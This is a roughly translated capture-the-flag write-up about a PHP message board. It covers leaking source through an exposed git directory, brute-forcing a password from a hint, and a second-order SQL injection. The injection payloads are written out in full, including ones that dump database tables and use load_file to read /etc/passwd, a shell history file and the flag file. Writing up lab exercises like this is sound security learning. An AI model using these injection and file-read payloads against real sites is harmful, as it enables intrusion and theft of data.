- Going in is a message board page. You need to log in to post. Not logged in. Go back to the login page.
- Don't do it or not, just scan it with dirsearch to see what files are there
- Wuhu! Accidentally found that git leaked! ! I still got a scan
mysql.php
??? The visit seems to be useless. I'll talk about it later - GitHack downloaded it and found that it was only downloaded to write_do.php
- Code post
<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
header("Location: ./login.php");
die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
break;
case 'comment':
break;
default:
header("Location: ./index.php");
}
}
else{
header("Location: ./index.php");
}
?>
- So it
session
must be equalyes
to - There is a brain hole here, we jump to
login.php
a small reminder
- Account: zhangwei Password: zhangwei***
- Here you can try to blast to get the correct account and password! Awesome!
- Write a script to list all three-digit numbers and letter combinations
str_a='123456789abcdefghijklmnopqrstuvwxzy'
for i in str_a:
for j in str_a:
for k in str_a:
print(i+j+k)
- The last password is
zhangwei666
- After successful login, the SQL injection described in the title should be on this page. Blind guessing is a secondary injection.
- Post a post first and then read the value
- Fuck you know if it's a secondary injection or can't figure it out and watched the wp
- I found that my GitHack download was
do_login.php
incomplete and attached the source code of the master
<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
header("Location: ./login.php");
die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
$category = addslashes($_POST['category']);
$title = addslashes($_POST['title']);
$content = addslashes($_POST['content']);
$sql = "insert into board
set category = '$category',
title = '$title',
content = '$content'";
$result = mysql_query($sql);
header("Location: ./index.php");
break;
case 'comment':
$bo_id = addslashes($_POST['bo_id']);
$sql = "select category from board where id='$bo_id'";
$result = mysql_query($sql);
$num = mysql_num_rows($result);
if($num>0){
$category = mysql_fetch_array($result)['category'];
$content = addslashes($_POST['content']);
$sql = "insert into comment
set category = '$category',
content = '$content',
bo_id = '$bo_id'";
$result = mysql_query($sql);
}
header("Location: ./comment.php?id=$bo_id");
break;
default:
header("Location: ./index.php");
}
}
else{
header("Location: ./index.php");
}
?>
————————————————
//版权声明:本文为CSDN博主「HyyMbb」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
//原文链接:https://blog.csdn.net/a3320315/article/details/104216070
- The key point of this topic is
category
the injection statement filled in write and thecontent
content filled in comment comment
category
Take out the data directly without any filtering operation- And we have
addslashes($_POST['category'])
processed it when writing , so we can spend some thought here - And the most pitted point of this question is
$content = addslashes($_POST['content']);
$sql = "insert into comment
set category = '$category',
content = '$content',
bo_id = '$bo_id'";
- Because it is a branch insertion, it is useless to add # after the injection. /**/
- for example:
When we posted
TITLE:database
CATEGORY:123',content=database(),/*
CONTENT:123
write in the message submission place
*/#
- At this time the code becomes
$content = addslashes($_POST['content']);
$sql = "insert into comment
set category = '123',content=database(),/*',
content = '*/#',
bo_id = '$bo_id'";
insert into comment
set category = '123',content=database(),/*',
content = '*/#',
bo_id = '$bo_id'";
- The page returned is
- Then I tried again
123',content=(select group_concat(table_name) from information_schema.tables where table_schema=database()),/*
- What returned is
board,comment,user
- I checked all the tables and failed to find the flag...
- So I started to view the file again
123',content=(select (load_file('/etc/passwd'))),/*
insert into comment
set category = '123',content=(select (load_file('/etc/passwd'))),/*',
content = '*/#',
bo_id = '$bo_id'";
- Returned value
123',content=(select (load_file('/home/www/.bash_history'))),/*
123', content=(select hex(load_file('/tmp/html/.DS_Store'))),/*
- After decoding
flag_8946e1ff1ee3e40f.php
123',content=(select (load_file('/var/www/html/flag_8946e1ff1ee3e40f.php'))),/*
- The flag is in F12! ! ! !
- An afternoon of manual injection! ! !